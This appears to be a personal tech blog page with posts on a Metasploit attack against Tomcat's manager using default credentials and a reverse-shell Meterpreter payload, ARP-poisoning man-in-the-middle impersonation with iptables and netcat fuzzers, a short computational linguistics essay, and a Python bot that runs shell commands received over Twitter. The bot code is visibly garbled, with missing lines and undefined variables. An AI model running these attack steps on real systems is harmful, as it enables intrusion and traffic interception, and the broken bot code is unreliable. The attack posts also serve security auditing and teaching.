Javier's Blog

Mostly computers and other tech stuff,...

Wednesday, July 18, 2012

My blog has moved...

My blog has moved to:

Tuesday, January 17, 2012

Tomcat Exploitation with Metasploit

So if you have something like this in your tomcat/conf/tomcat-users.xml:

< ?xml version='1.0' encoding='utf-8'? >
< tomcat-users >
  < role rolename="manager"/ >
  < user username="tomcat" password="tomcat" roles="manager"/ >
< /tomcat-users >

You can use msf to pwn it:
use exploit/multi/http/tomcat_mgr_deploy
set PASSWORD tomcat
set USERNAME tomcat
set RPORT 8080
set PAYLOAD java/meterpreter/reverse_tcp
show options
set TARGET 1

This works on apache-tomcat-5.5.35 (confirmed) and 6.x, probably 7.x too. Moral of the story: don't use tomcat-users.xml to authenticate users, i.e., you are saving a password in plain-text and you are probably using an easily guessable password...

Friday, October 28, 2011

Web frameworks and internet security

Didn't know until recently that I could find my thesis so easily, here is a direct link to the SDSU library: http://libpac.sdsu.edu/record=b3732273~S0

Sunday, September 25, 2011

Man-in-the-Middle Server Impersonation

The Challenge
Over the years I’ve seen many presentations on Main-in-the-Middle (MitM) attacks via ARP poisoning and have found a number of tools that can do this, but I’ve never seen anyone present this technique targeting a specific server-client connection with the aim of testing the client side. Recently I was given the task to audit a piece of software that makes a secure connection (HTTPS) to a server and transfers data back and forward. This brings up a number of challenges: first and foremost is traffic redirection, i.e., getting in the middle, getting in the middle is trivial if the attack machine resides on the same network as the victim machine, any of these tools can perform ARP poisoning: Cain, Ettercap, Dsniff, etc. The second challenge is to impersonate a specific server, i.e., respond only to traffic destined to the server that is to be impersonated, and last but not least is to break or bypass SSL encryption.

I initially began testing by using Cain to perform ARP poisoning. Cain is a feature-full penetration testing application, which I used to perform the MitM attack. So being able to redirect traffic, the task of bypassing SSL can also be done with Cain right? Not so fast. Cain does have the ability to proxy SSL connections; it generates certificates for any SSL connection it sees and replies to the client with the generated certificates while at the same time connecting to the server side, relaying the connection. This worked great when I was testing SSL connections with a Web browser to a number of sites, but Cain failed when attempting to proxy connections for the server I was interested in impersonating. I am not sure exactly why Cain failed (“Couldn’t accept SSL connection from the client”), it may have to do with SSL cipher strength, or somehow the client knew that the certificate that Cain generated was invalid, whatever the case, Google was not much help. Even if this had worked, I wanted to reply to a specific outbound connection, but Cain simply allowed me to eavesdrop (snoop) on traffic, not to impersonate a server.

The second challenge of replying to a specific connection (server impersonation) seemed a bit tough at first since I’ve never heard of a tool to do this, or so I thought. I was a bit puzzled until I figured that all I need to do was to masquerade packets forwarding them to my target machine and reply to the connection as if the request was being made directly to my attack machine. Now what tool can I use to masquerade packets? Iptables? Of course, using Iptables I was able to reply only to a specific server from a specific client.

First we need to be able to forward packets:
echo 1 > /proc/sys/net/ipv4/ip_forward

Then we need to masquerade packets:
iptables -t nat -A PREROUTING -i eth0 -p tcp -s victim -d server --dport 443 -j REDIRECT --to-port 443

So at this point I am redirecting all traffic from the victim through my attack machine and impersonating the target server. I used Ettercap (switched from Cain since Cain only runs on Windows) to redirect traffic through the attack machine via ARP poisoning, and Iptables to change the destination IP address of the target server. At this point, I setup Apache to make the SSL connection and server data to the client. I wrote a quick and dirty PHP script to fuzz the client, but Apache kept on giving me some out of memory errors when my responses got too big. So I then wrote a couple of one-line fuzzers that did not use Apache:

Fill up memory with AAA...:
ruby -e 'while true; print "A"; end' | nc -l -p 80

Fill up memory with random data:
ruby -e 'while true; print rand(127).chr; end' | nc -l -p 80

Now the only challenge was to feed this data through an SSL channel. While searching for other SSL proxies, since Cain proved to be the wrong tool, I ran into this little tool called Stunnel, universal SSL tunnel. By simply setting three options in its configuration file (client=no, accept=80, connect=443) I was able to setup a listener on port 443, which is redirects traffic to port 80.

Not too bad eh…

  • Attack machine is on the same network as victim machine
  • Client does not perform SSL verification

Tuesday, July 05, 2011

I always forget basename

I always forget the name of this handy tool:

Basename does more than return the base name of a file, i.e.,
basename /path/to/some/file.txt
It also can give you the file without the extension, e.g.,
basename /path/to/some/file.txt .txt
This may seem pretty useless, but it is very handy when you are deep in some script doing something like:

for WAR in `ls *.war`; do
  DIR=`basename $WAR .war`
  mkdir $DIR
  cd $DIR 
  jar -xvf $WAR

I just thought I'd make this entry because I always seem to forget what the name of this simple tool is...

Friday, February 25, 2011

Just a Quick Paper on Computational Linguistics


Communication with computer systems is becoming increasingly natural. Although the technology depicted in current science fiction novels and films might seem farfetched, computer interaction via speech is becoming a reality. Many specialized systems have been developed for use by the disabled, which allows for interaction with a computer system via speech and other means. There are countless speech to text and text to speech applications which can be deployed on ordinary computers. Even most modern cellular phones have some type of speech enabled command capability. It is true that this technology is at its infancy and has a long way to go before we can seamlessly communicate with computer systems via speech. But recent advances in this technology, known as Computational Linguistics, seem to grasp at what someday will no longer be science fiction.

Computational Linguistics, a subdivision of the broader subject known as Natural Language Processing (NLP), deals with language based human-computer interaction, as well as computer aided language translation. Computational Linguistics is used in many applications, speech recognition, language translation, spelling and grammar checking, etc. The primary techniques now used in Computational Linguistics are statistical in nature and have brought significant advances to the field in recent years [1]. A system which is to seamlessly communicate via a natural language must have the following abilities: speech recognition, natural language understanding, natural language generation and speech synthesis, [3] all of which fall under Computational Linguistics. Other abilities such a system must have are information retrieval and extraction as well as inference; these are however, a bit out of the realm of Computational Linguistics. Given the complexity of natural languages, the task that computational linguists have taken up is more difficult than once thought.


There is some debate about the approach that computational linguists have taken. Rational linguists, lead by Noam Chomsky, believe that statistical analysis has little to no chance at encompassing language entirely. Part of the bias against statistical analysis comes from the fact that early statistical NLP systems were extremely simple and could not begin to process the complexity of language. Another argument against statistical analysis is that computing the probability of sentences from a body of text would assign the same probability to grammatical and ungrammatical sentences [2]. Furthermore, there are sentences which are grammatically correct but are nonsensical in nature. Chomsky’s famous example of this is “Colorless green ideas sleep furiously,” a sentence which is grammatically correct but does not make sense. The argument here is that a system which is to communicate with humans must be able to decipher such a sentence as erroneous.

Computational linguists handle this issue by not worrying about which sentences are grammatically correct and which are not, instead, they make note of sentences which are likely to be said. Correct sentences are more likely to be said while incorrect sentences are less likely to be said. Often used sentences, regardless of whether they are considered correct or not, are considered part of the language as they convey some mutually agreed meaning. The earlier issue about the complexity of Computational Linguistic systems is no longer an issue since modern Computational Linguistic systems are nearly as complex as the models developed by rational linguists. The difference being that the former takes a statistical approach to learning and does not try to represent every part of the brain as we understand it.


The main challenge computational linguists have taken up is the disambiguation of language. In the current state of affairs, computer systems learn from bodies of text, known as corpora [2], as they cannot observe the natural word around us and infer information as we do. The problem with this approach is that sentences often may be parsed in more ways than one. Sentences, for example, may be parsed so that their verb groups contain one word for one meaning, and multiple words for another meaning. Under these situations multiple parse trees may be generated, each parse tree having a slightly different meaning than similar trees. For long sentences, the number of applicable parse trees may be enormous [2].

Computational Linguists argue that by using a statistical NLP approach, where lexical and structural preferences in language are computed, the issue of numerous permutations of parse trees becomes moot. This approach aims at approximating the appropriate representation for a parse tree which conveys the meaning of the sentence. Lexical and structural preferences are learned or remembered by Computational Linguistic systems via N-grams.


N-grams are collections of words as they would appear in a natural language i.e. a sentence fraction where ‘n’ is the number of words in that fraction. For example, given the sentence “the fox jumped over the dog,” its corresponding trigram (3-gram) would consist of “the fox jumped”, “fox jumped over”, “jumped over the”, “over the dog.” These n-grams are built by parsing corpora and partitioned by having the previous (n - 1) words in common. A state sequence machine or automaton can be built from these n-gram partitions to identify the probabilities of one word or state to follow another. Using the statistical qualities of n-grams, the next word (n) may be predicted in a sentence fragment with relative accuracy. A variation of this model, where the state sequence is originally unknown, is referred to as the Hidden Markov Model (HMM). HMMs are the foundation to modern speech recognition systems [2] as well as other NLP applications.


Augmented Transition Networks (ATNs) build on the idea of using finite state machines in order to grammatically parse sentences. W. A. Wood in “Transition Network Grammars for Natural Language Analysis” claims that by adding a recursive mechanism to a finite state model, parsing can be achieved much more efficiently. Instead of building an automaton for a particular sentence, a collection of transition graphs are built. A grammatically correct sentence is parsed by reaching a final state in any state graph. Transitions between these graphs are simply subroutine calls from one state to any initial state on any graph in the network. A sentence is determined to be grammatically correct if a final state is reached by the last word in the sentence.

This model meets many of the goals set forth by the nature of language in that it captures the regularities of the language. That is, if there is a process that operates in a number of environments, the grammar should encapsulate the process in a single structure [4]. Such encapsulation not only simplifies the grammar, but has the added bonus of efficiency of operation. Another advantage of such a model is the ability to postpone decisions. Many grammars use guessing when an ambiguity comes up. This means that not enough is yet known about the sentence. By the use of recursion, ATNs solve this inefficiency by postponing decisions until more is known about a sentence [4].


As it can be clearly seen by this brief overview of Computational Linguistics, the field is complex and evolving. Although Computational Linguistics is at its infancy, much of the ground work has already been laid out. It is hard to determine whether a system with similar abilities to those of 3CPO (Star Wars) will ever become a reality, but it is clear that a subset of those abilities are already helping us with our everyday lives. Applications such as speech recognition and text translation are not perfect by any means, but are simply a subset of the capabilities future systems will have at their disposal.


[1] Steven Abney. Statistical Methods and Linguistics. In: Judith Klavans and Philip Resnik (eds.), The Balancing Act: Combining Symbolic and Statistical Approaches to Language. The MIT Press, Cambridge, MA. 1996.

[2] Christopher D. Manning and Hinrich Schütze, 1999, Foundations of Statistical Natural Language Processing, MIT Press, Cambridge, MA.

[3] Daniel Jurafsky and James H. Martin, 2000, Speech and Language Processing, Prentice Hall, Upper Saddle River, New Jersey.

[4] Transition Network Grammars for Natural Language Analysis, W. A. Woods, Communications of the ACM, Volume 13 , Issue 10 (October 1970) Pages: 591 - 606, ISSN:0001-0782

Sunday, December 05, 2010

We Won Capture the Flag


I got a bit bored during the SANS GIAC class so I decided to whip up a twitter bot. Nothing fancy, just a quick & dirty way to command a machine through twitter.

First, you have to register a new account which will house the application and register a new application at http://dev.twitter.com/apps once that is done, then make note of your API key, Consumer Secret, Access token and secret.

Second, get the required python packages: python-twitter & python-oauth2

hg clone http://python-twitter.googlecode.com/hg/ python-twitter
cd python-twitter/
python setup.py build
sudo python setup.py install 
git clone https://github.com/simplegeo/python-oauth2.git
cd python-oauth2/
python setup.py build
sudo python setup.py install

Third, execute the code below (python twitbot.py:


import twitter, time, os

class TwitServ:
  api = None
  def login(self):
    self.api = twitter.Api(consumer_key='***',

  def printFriends(self):
    friends = self.api.GetFriends()
    for f in friends:
      allfriends+=f.name + ' '
    print "All my friends are " +allfriends
    #print [u.name for u in users]
    #api.PostUpdates("I am Bot, hear me roar...")

  def getLastProcessedMsgId(self):
    f=open('lastmsgid', 'r')
    return f.readline()

  def saveLastMsgId(self, id):
    f=open('lastmsgid', 'w')

  def getLastMsg(self):
    print "Last message: " + dirmsgs[0].text
    return dirmsgs[0]

  # print str(lastmsg.id) + ' ' + str(lastmsgid)
  def reply(self):
    if str(lastmsg.id) != self.getLastProcessedMsgId():
      for i in result:
        self.api.PostDirectMessage(lastmsg.sender_id, msg[:140])
        #self.api.PostUpdates(msg[:140]) # Use this if you want replies to be public
        print "Sending  messge to "+lastmsg.sender_id+": " + msg[:140]
      except twitter.TwitterError:
        print "Error sending message, possible duplicate message"
      print "No new messages to process..."

  def serve(self):
    print "logged in..."
    while True:

if __name__ == "__main__":

To command TwittBot simply send a direct msg to is:
d IamBot uname -a